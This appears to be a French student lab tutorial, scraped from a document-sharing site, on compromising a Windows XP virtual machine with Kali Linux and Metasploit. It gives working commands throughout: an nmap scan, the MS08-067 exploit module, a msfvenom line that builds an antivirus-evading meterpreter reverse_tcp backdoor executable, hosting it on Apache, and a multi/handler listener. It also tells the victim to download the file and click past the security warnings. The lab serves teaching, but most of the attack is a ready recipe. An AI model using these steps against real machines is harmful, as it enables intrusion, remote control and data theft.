0% ont trouvé ce document utile (0 vote)
275 vues6 pages

Exploitation Des Vulnérabilités de Windows XP Avec Kali Linux Et Metasploit: Création D'une Backdoor

Transféré par

hajar ismaili
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
275 vues6 pages

Exploitation Des Vulnérabilités de Windows XP Avec Kali Linux Et Metasploit: Création D'une Backdoor

Transféré par

hajar ismaili
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Exploitation des Vulnérabilités de Windows XP avec

Kali Linux et Metasploit :


Création d'une Backdoor
Filière : GSTR3
Akram CHHAYBI
[email protected]

Objectifs :
 Découvrir les vulnérabilités des systèmes d'exploitation obsolètes.
 Apprendre à exploiter une machine Windows XP via des vulnérabilités connues.
 Utiliser Metasploit pour créer un backdoor et maintenir un accès permanent.
 Comprendre les risques associés aux systèmes non mis à jour.
Présentation des Outils

 Kali Linux : Distribution Linux pour le pentesting, contenant Metasploit, Nmap, et divers outils de
tests de sécurité.
 Windows XP : Version obsolète du système d'exploitation Windows, vulnérable à de nombreuses
failles non corrigées.
 Metasploit Framework : Plateforme permettant de trouver et d'exploiter des vulnérabilités.

Mise en Place de l’Environnement


Configuration des Machines Virtuelles:
 Windows XP : Installation de Windows XP dans une machine virtuelle (VirtualBox ou VMware).
 Kali Linux : Installation de Kali Linux dans une autre machine virtuelle ou en dual boot.
 Configuration Réseau : Assurer que les deux machines sont sur le même réseau local virtuel (NAT
ou réseau privé).
Partie 1 : Exploitation des Vulnérabilités de Windows XP
Objectif : Utiliser Metasploit pour découvrir et exploiter des vulnérabilités sur un système Windows XP
non mis à jour.

Découverte des Vulnérabilités et Scanning du Réseau


Identification de la Cible:

Utiliser Nmap pour identifier les adresses IP du réseau et découvrir les ports ouverts de la machine Windows
XP. nmap -sS -A IP_add

Utilisation de Metasploit pour l’Exploitation de Windows XP


Recherche et Utilisation d’un Exploit :
Exploit MS08-067 : Utiliser l'exploit MS08-067, une vulnérabilité critique de Windows XP. search ms08-
067

Chargement de l'Exploit:
Charger l’exploit en utilisant la commande: use exploit/windows/smb/ms08_067_netapi

 Configuration de l'Exploit : Définir l'adresse IP de la cible (RHOST) et le port (RPORT).


 Lancement de l'Exploitation : Lancer l’exploit et obtenir un shell sur la machine Windows XP.

Partie 2 : Création et Installation d'un Backdoor sur Windows


XP
Objectif :
 Apprendre à détecter les attaques de chevaux de Troie et de backdoors.
 Créer un serveur et tester le réseau pour une attaque.
 Attaquer un réseau à l'aide d'un backdoor exemple et surveiller l'activité du système.

Définition de Backdoor :
Les backdoors sont des fichiers malveillants qui contiennent des chevaux de Troie ou d'autres applications
infectieuses qui peuvent soit arrêter le système actuel d'une machine cible, soit prendre un contrôle partiel
ou complet de celle-ci. Les attaquants créent ces backdoors dans le but d'obtenir un accès distant aux
machines des victimes. Ils envoient ces backdoors par e-mail, via des applications de partage de fichiers,
des réseaux partagés, des pilotes réseau, entre autres, et incitent les utilisateurs à les exécuter. Une fois
que l'utilisateur exécute une telle application, l'attaquant peut accéder à sa machine infectée et effectuer
des activités telles que la capture des frappes au clavier, l'extraction de données sensibles, etc.

Définition de payload:
Un payload est une partie spécifique d'un exploit qui exécute une action malveillante une fois que
l'attaquant a réussi à exploiter une vulnérabilité sur la machine cible. En d'autres termes, c'est le code qui
est injecté pour réaliser l'objectif final de l'attaque, comme ouvrir une session à distance, voler des
données, installer un logiciel malveillant, etc.

Par exemple, dans le contexte de l'outil Metasploit, un payload est utilisé pour définir ce que l'attaquant
souhaite accomplir après avoir exploité une vulnérabilité, comme :

 Reverse Shell : Fournit un accès distant à la machine cible, en établissant une connexion depuis la
machine cible vers l'attaquant.
 Bind Shell : Ouvre un port sur la machine cible, permettant à l'attaquant de s'y connecter.
 Meterpreter : Un type de payload avancé qui permet une interaction post-exploitation avec la machine
cible, offrant une variété de commandes comme la capture de frappes au clavier, la capture d'écran, etc.

Dans le cas de la commande que tu as fournie, le payload est windows/meterpreter/reverse_tcp, ce


qui signifie qu'une fois le backdoor exécuté, il permettra à l'attaquant d'établir une session meterpreter
avec la machine cible via une connexion TCP inverse.

I- Préparer le Backdoor
Créer le Backdoor.exe
Passez à Kali Linux et ouvrez une fenêtre Terminal, tapez la commande pour créer le payload :
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b
"\x00" LHOST=10.0.2.42 -f exe > /root/Desktop/Backdoor.exe

Cette commande utilise msfvenom pour créer un fichier backdoor. Voici une explication des
différentes options :

 msfvenom : Outil permettant de créer des payloads personnalisés pour différents types d'attaques.
 -p windows/meterpreter/reverse_tcp : Spécifie le type de payload à créer. Ici, c'est un payload
meterpreter de type reverse TCP pour Windows. Cela signifie que la machine cible va se connecter à
l'attaquant après l'exécution du backdoor.

 --platform windows : Indique que le payload est destiné à la plateforme Windows.

 -a x86 : Spécifie l'architecture du payload, ici x86 (32 bits).

 -e x86/shikata_ga_nai : Utilise l'encodeur shikata_ga_nai pour chiffrer le payload et éviter la détection


par les antivirus.

 -b "\x00" : Exclut le caractère \x00 (null byte) du payload, afin d'éviter tout problème lors de l'exécution.

 LHOST=10.0.2.42 : Définit l'adresse IP de l'hôte qui recevra la connexion de retour (machine de


l'attaquant).
 -f exe : Spécifie le format du fichier de sortie, ici un exécutable Windows (.exe).

 > /root/Desktop/Backdoor.exe : Enregistre le fichier créé sur le bureau de Kali Linux sous le nom
Backdoor.exe.

II- Partager le Backdoor


Démarrer les services Apache :
Pour que le fichier Backdoor.exe soit accessible via le réseau, nous devons démarrer le serveur web Apache.
Utilisez la commande suivante : service apache2 start

Copier le Backdoor.exe dans le répertoire partagé :


Une fois Apache en cours d'exécution, nous devons copier le fichier Backdoor.exe dans le répertoire de partage
qui est accessible via le serveur web. Utilisez la commande suivante :
cp /root/Desktop/Backdoor.exe /var/www/html/share/

Explication:
`/root/Desktop/Backdoor.exe` : chemin du fichier Backdoor.exe que nous avons créé précédemment.
/var/www/html/share/` : répertoire où Apache sert les fichiers web. En copiant le fichier ici, il sera accessible via
une adresse web locale, permettant à l'utilisateur de le télécharger.
Après avoir effectué ces étapes, le fichier Backdoor.exe sera accessible à partir du serveur web Apache, et
l'attaquant pourra le partager avec la cible, incitant l'utilisateur à l'exécuter.

III- Configurer le Handler


Ouvrir une nouvelle fenêtre Terminal et démarrer Metasploit Framework :

Utilisez la commande suivante pour lancer Metasploit : msfconsole

Sélectionner l'exploit multi/handler :


Une fois Metasploit lancé, vous devez sélectionner l'exploit qui va gérer la connexion du payload lorsque le
backdoor est exécuté. Tapez la commande suivante : use exploit/multi/handler

Configurer le payload reverse TCP :


Ensuite, vous devez définir le payload que vous avez créé plus tôt. Cela permettra au handler de gérer la
connexion inverse. Tapez : set payload windows/meterpreter/reverse_tcp

Afficher les configurations du payload :


Pour vérifier et voir les options configurables de votre payload, utilisez la commande suivante : options

Définir LHOST avec l'adresse IP de Kali :


Pour que le payload puisse se connecter à votre machine Kali, vous devez définir l'adresse IP de Kali en tant
que LHOST. Tapez la commande suivante : set LHOST IP_attaquant

Vérifier le LPORT :

Le port local (LPORT) est généralement 4444 pour les connexions reverse TCP. Si ce port est correct, vous n’avez
pas besoin de le changer. Vous pouvez le vérifier avec la commande options.

Démarrer le handler en arrière-plan :


Une fois que vous avez configuré LHOST et confirmé LPORT, vous pouvez démarrer le handler en arrière-plan
avec la commande suivante : exploit -j -z

Explication:
 -j : Permet à Metasploit de lancer le handler en tant que tâche d'arrière-plan (job) afin que vous puissiez
continuer à utiliser la console Metasploit pour d'autres commandes si nécessaire.
 -z : Démarre le handler sans le passage en avant (foreground), ce qui signifie que vous n'aurez pas d'interface
interactive pour cette session, mais elle fonctionnera en arrière-plan.

Après avoir exécuté cette commande, le handler sera prêt à recevoir des connexions de la part du backdoor une
fois qu'il sera exécuté sur la machine cible.

IV- Télécharger et exécuter le Backdoor.exe


1. Passer à votre machine virtuelle Windows :
Ouvrez votre machine virtuelle Windows où vous souhaitez tester le backdoor.
2. Lancer le navigateur :
Ouvrez un navigateur web (comme Internet Explorer, Chrome ou Firefox).
3. Saisir l'URL (basée sur votre adresse IP de Kali) :
Dans la barre d'adresse du navigateur, tapez l'URL suivante :http://10.0.2.42/share/

Explication:
 Cette URL pointe vers le répertoire partagé où vous avez copié le fichier Backdoor.exe sur votre serveur
web Apache. Cela permettra à l'utilisateur de télécharger le fichier.

Télécharger le fichier :
Une fois que vous êtes sur la page, vous devriez voir le fichier Backdoor.exe. Cliquez dessus pour le télécharger.

Exécuter le Backdoor.exe :
Après le téléchargement, localisez le fichier dans votre dossier de téléchargements (ou l'emplacement par défaut
pour les fichiers téléchargés) et double-cliquez dessus pour l'exécuter.

Remarque :
L'exécution du backdoor permettra d'établir la connexion avec votre machine Kali, ce qui déclenchera la session
Meterpreter sur le handler que vous avez configuré précédemment.

Assurez-vous que la machine Windows n'a pas de protection antivirus ou de pare-feu qui pourrait bloquer le
téléchargement ou l'exécution du fichier.

Double-cliquer sur l'application :

Dans votre machine virtuelle Windows, double-cliquez sur Backdoor.exe pour l'exécuter.

Accepter les avertissements :

Si des avertissements de sécurité apparaissent (comme des messages indiquant que le fichier est potentiellement
dangereux), vous devrez les accepter pour permettre l'exécution de l'application. Cela peut inclure des
avertissements de Windows Defender ou d'autres logiciels de sécurité.

Revenir à Kali :

Une fois que vous avez exécuté l'application, revenez à votre machine Kali. Vous devriez voir que le handler
Metasploit a établi une connexion avec la machine Windows.

V- Vérification de la connexion :

Dans la console Metasploit, vous pouvez utiliser la commande suivante pour vérifier si une session Meterpreter
est active : sessions

Afficher les informations du système cible :


Une fois dans la session Meterpreter, tapez la commande suivante pour afficher les informations sur le système
cible, telles que le nom de l'ordinateur, le système d'exploitation, etc. : sysinfo

Vous aimerez peut-être aussi